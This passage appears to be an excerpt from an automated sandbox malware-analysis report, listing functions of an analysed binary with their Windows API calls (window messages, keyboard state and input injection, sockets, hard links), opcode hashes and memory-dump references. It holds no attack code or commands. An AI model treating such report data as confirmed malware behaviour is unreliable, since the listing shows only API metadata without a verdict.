                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      • API String ID: 2507767853-685833217
                                                      • Opcode ID: 95232af82497f8cde1437ffea8a8580be830eb5dafd49d5a71f683776a4d912e
                                                      • Instruction ID: 5a0614ed18aaf4861641b77eaf90cd424113db39b51cbd28328dcd1f0398ca5e
                                                      • Opcode Fuzzy Hash: 95232af82497f8cde1437ffea8a8580be830eb5dafd49d5a71f683776a4d912e
                                                      • Instruction Fuzzy Hash: 53317371A00208AFDB10DF54C885EAABBF8EF49308F1490A5F509EF252D771ED46CB61
                                                      Function 00EC41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EC424F
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EC4264
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EC4271
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 98fa022b60fe75f95620c1712e6e270303add447d9b1ac6048f4bc99cc9b17fc
                                                      • Instruction ID: 0633de6c52766776627c1257c9e881fef9e18e8dab0110029716b1b58726b78f
                                                      • Opcode Fuzzy Hash: 98fa022b60fe75f95620c1712e6e270303add447d9b1ac6048f4bc99cc9b17fc
                                                      • Instruction Fuzzy Hash: CF11E372240208BEEF205F69CC06FAB3BACEF85B58F111128FA55F20E0D272D8529B10
                                                      Function 00E92F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                        • Part of subcall function 00E92DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E92DC5
                                                        • Part of subcall function 00E92DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E92DD6
                                                        • Part of subcall function 00E92DA7: GetCurrentThreadId.KERNEL32 ref: 00E92DDD
                                                        • Part of subcall function 00E92DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E92DE4
                                                      • GetFocus.USER32 ref: 00E92F78
                                                        • Part of subcall function 00E92DEE: GetParent.USER32(00000000), ref: 00E92DF9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E92FC3
                                                      • EnumChildWindows.USER32(?,00E9303B), ref: 00E92FEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 1272988791-1110647743
                                                      • Opcode ID: 681b7543ca74b7de1234ca3ad636c615f40be915dc7f11048aa2aa98d9eaae3e
                                                      • Instruction ID: 68459877ee39f016db9d1f8ec6be9fc83a101dcfad58dafd8213a81b32e103bf
                                                      • Opcode Fuzzy Hash: 681b7543ca74b7de1234ca3ad636c615f40be915dc7f11048aa2aa98d9eaae3e
                                                      • Instruction Fuzzy Hash: 531184716002057BCF147F749C89EED77AAAF94304F14A079FE09BB252DE71994ACB60
                                                      Function 00EC5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC58C1
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC58EE
                                                      • DrawMenuBar.USER32(?), ref: 00EC58FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      • API String ID: 3227129158-4108050209
                                                      • Opcode ID: 9a9a2b30b5568da8a0040626b5770ee097b736f9e0e161d99542cd10ea7ec7c1
                                                      • Instruction ID: 2300fe6f81c060b968a5d0b3b9691bbe98a187981c4b5fc2ad2ea62216239d5b
                                                      • Opcode Fuzzy Hash: 9a9a2b30b5568da8a0040626b5770ee097b736f9e0e161d99542cd10ea7ec7c1
                                                      • Instruction Fuzzy Hash: F0015E32500218EEDB219F11DC44FAEBBB4FB85765F1080A9E859E6151DB319A86DF21
                                                      Function 00E8D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00E8D3BF
                                                      • FreeLibrary.KERNEL32 ref: 00E8D3E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      • API String ID: 3013587201-2590602151
                                                      • Opcode ID: e6da47e55927f73a9944d5ad0073980bd2b719e9a89371853eecdebc73d66905
                                                      • Instruction ID: 2e3e5aa84aaa96f5d4adcf8206551041c0a44e1ef5ceb8cf333ca8964d08dddd
                                                      • Opcode Fuzzy Hash: e6da47e55927f73a9944d5ad0073980bd2b719e9a89371853eecdebc73d66905
                                                      • Instruction Fuzzy Hash: 46F0E53184E621AFD73136165C54EE97324AF10B01B69B679E80EF21D5DB20CD468792
                                                      Function 00E9007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bcafedaef8140e5e9e93f3e2a5f19c3b91e5b37c4c33a78e085e4025687dd54
                                                      • Instruction ID: a3f8a35674b4140bc47c9ee86fd9815c88c6ec6fb2a2c8e0b387654fa62d977e
                                                      • Opcode Fuzzy Hash: 4bcafedaef8140e5e9e93f3e2a5f19c3b91e5b37c4c33a78e085e4025687dd54
                                                      • Instruction Fuzzy Hash: D1C16C75A0021AEFCB14CFA8C894EAEB7B5FF48704F609598E905EB251D731EE41DB90
                                                      Function 00EB342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                      • String ID:
                                                      • API String ID: 1998397398-0
                                                      • Opcode ID: a9e93f6237186c4b26a05335fa79a02e5bbfe99e585b5426dcd8e784ed38321b
                                                      • Instruction ID: 8b6784ba3e417f223550e9e391abcaf6f4cd089565b8e4a41716a6facd14e5ae
                                                      • Opcode Fuzzy Hash: a9e93f6237186c4b26a05335fa79a02e5bbfe99e585b5426dcd8e784ed38321b
                                                      • Instruction Fuzzy Hash: 82A18075604300AFCB14DF25C486A6ABBE5FF88714F14985DF98AAB362DB30ED01CB91
                                                      Function 00E90436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ECFC08,?), ref: 00E905F0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ECFC08,?), ref: 00E90608
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00ECCC40,000000FF,?,00000000,00000800,00000000,?,00ECFC08,?), ref: 00E9062D
                                                      • _memcmp.LIBVCRUNTIME ref: 00E9064E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 628568de44f0678239a8ef875ebd96ed0a6d053dea258859a71cf0fd72e4ef16
                                                      • Instruction ID: 00604242a96e5dfc1cfb9e0a6855f9e602a84e30463823a0bc2e49912cd1efc8
                                                      • Opcode Fuzzy Hash: 628568de44f0678239a8ef875ebd96ed0a6d053dea258859a71cf0fd72e4ef16
                                                      • Instruction Fuzzy Hash: 65810771A00109AFCF04DF94C988EEEB7B9FF89315F605558E516BB250DB71AE06CB60
                                                      Function 00E71391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1bdfaf60cd36902e1c99475a67a2993478250f4666f0b5afe55660ab5cc4bb91
                                                      • Instruction ID: 3543d0a2da71b5c9f5ed994c94c2420c9fe86f93a21aaacea82eb7c71cfd3d6b
                                                      • Opcode Fuzzy Hash: 1bdfaf60cd36902e1c99475a67a2993478250f4666f0b5afe55660ab5cc4bb91
                                                      • Instruction Fuzzy Hash: D9416D756003006BDB256BBD9C46ABE3AE5EF417B0F24A6A5F83DF3292F63448425361
                                                      Function 00EC6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(011BEFC0,?), ref: 00EC62E2
                                                      • ScreenToClient.USER32(?,?), ref: 00EC6315
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EC6382
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: c7dc530d2aeef02d3b5c270ff5b4cd8604b9ccfd5a5bd71ba026b61245accddd
                                                      • Instruction ID: df25edd0a986670b8c3651352034093a2017c496c515c3fa20f3ffb3ecb41082
                                                      • Opcode Fuzzy Hash: c7dc530d2aeef02d3b5c270ff5b4cd8604b9ccfd5a5bd71ba026b61245accddd
                                                      • Instruction Fuzzy Hash: 77514C70900249AFDF14DF68DA80EAE7BB5FB85364F10916DF815AB2A0D731AD42CB50
                                                      Function 00EB1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00EB1AFD
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1B0B
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EB1B8A
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1B94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$socket
                                                      • String ID:
                                                      • API String ID: 1881357543-0
                                                      • Opcode ID: ff40ca8910806199bc0fce344d0de4971b1f35b0231b97cdfe81332a061ee2a9
                                                      • Instruction ID: e72097cf13289b65a0e8f90287eb63fe5a1ef9b9fd0c706afe072594c255763d
                                                      • Opcode Fuzzy Hash: ff40ca8910806199bc0fce344d0de4971b1f35b0231b97cdfe81332a061ee2a9
                                                      • Instruction Fuzzy Hash: BA41D575600200AFD720AF24D88AF667BE5AB44718F54D49CF61AAF3D2D772DD41CB90
                                                      Function 00E6B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 403e36f19871c95b08ccea1f1b8742252be45f21d903387016cc5b9f46cedcc7
                                                      • Instruction ID: 2ebba378716f484b8a255e019b80a5b4a8b897cccc1cbbd3c6686a41c5d3cf9d
                                                      • Opcode Fuzzy Hash: 403e36f19871c95b08ccea1f1b8742252be45f21d903387016cc5b9f46cedcc7
                                                      • Instruction Fuzzy Hash: 98416971A40314BFD724AF38DC01BAABBE9EB84350F10952EF112FB291E77199418780
                                                      Function 00EA56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EA5783
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00EA57A9
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EA57CE
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EA57FA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: a2f1ea830e151317b0e5abba8fd693899e1a44b34ea3315afc09f6e6fc80d449
                                                      • Instruction ID: fc63f32eeaa7df7ceb0d71531e8f26e9f8c770b09e9a049c537e1a581a2cfea8
                                                      • Opcode Fuzzy Hash: a2f1ea830e151317b0e5abba8fd693899e1a44b34ea3315afc09f6e6fc80d449
                                                      • Instruction Fuzzy Hash: 38411C3A600610DFCB25DF15C444A59BBE2EF49324F199498E84A7F362CB35FD01CB91
                                                      Function 00E6D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E582D9,?,00E582D9,?,00000001,?,?,00000001,00E582D9,00E582D9), ref: 00E6D910
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E6D999
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E6D9AB
                                                      • __freea.LIBCMT ref: 00E6D9B4
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 4786f4b6f89ffaf602e7c64e9679145c96a7b50f007d2e52211e386e51759dce
                                                      • Instruction ID: 6db2ded456b79c9a14c4b07581b35b9881b0279195df0f97012790e8af09e8f8
                                                      • Opcode Fuzzy Hash: 4786f4b6f89ffaf602e7c64e9679145c96a7b50f007d2e52211e386e51759dce
                                                      • Instruction Fuzzy Hash: 6A31DE72E0020AABDF24CF65EC45EAF7BA5EB80354B154168FC08E7290EB75CD55CBA0
                                                      Function 00EC52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00EC5352
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC5375
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC5382
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EC53A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                      • String ID:
                                                      • API String ID: 3340791633-0
                                                      • Opcode ID: cf40ace1862894e34e2bdfb7297ab95b9b7d377f4eaf086e73b05d1950eacf21
                                                      • Instruction ID: a0cd337c3862d8323ac79c79a92fd91c59920d94c5d933b5b34260eee0fc0bd2
                                                      • Opcode Fuzzy Hash: cf40ace1862894e34e2bdfb7297ab95b9b7d377f4eaf086e73b05d1950eacf21
                                                      • Instruction Fuzzy Hash: 9731E632B55A48EFEB309F1CCE05FE83761AB04394F586119FA10B61E5C7B2B9C29B41
                                                      Function 00E9AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E9ABF1
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E9AC0D
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E9AC74
                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E9ACC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 313684724e7589c49eb49cd5e05a06959f10c6b33593293db3f129945358fa27
                                                      • Instruction ID: ffb82d444966bfabe93ee3bf605d149f0f4170b1712f95a2f7e7192d75d51f24
                                                      • Opcode Fuzzy Hash: 313684724e7589c49eb49cd5e05a06959f10c6b33593293db3f129945358fa27
                                                      • Instruction Fuzzy Hash: 22310830A00618AFEF35CB658C04BFAFBA5AF89315F1C663AE4857A1D1C375898587D2
                                                      Function 00EC7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00EC769A
                                                      • GetWindowRect.USER32(?,?), ref: 00EC7710
                                                      • PtInRect.USER32(?,?,00EC8B89), ref: 00EC7720
                                                      • MessageBeep.USER32(00000000), ref: 00EC778C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
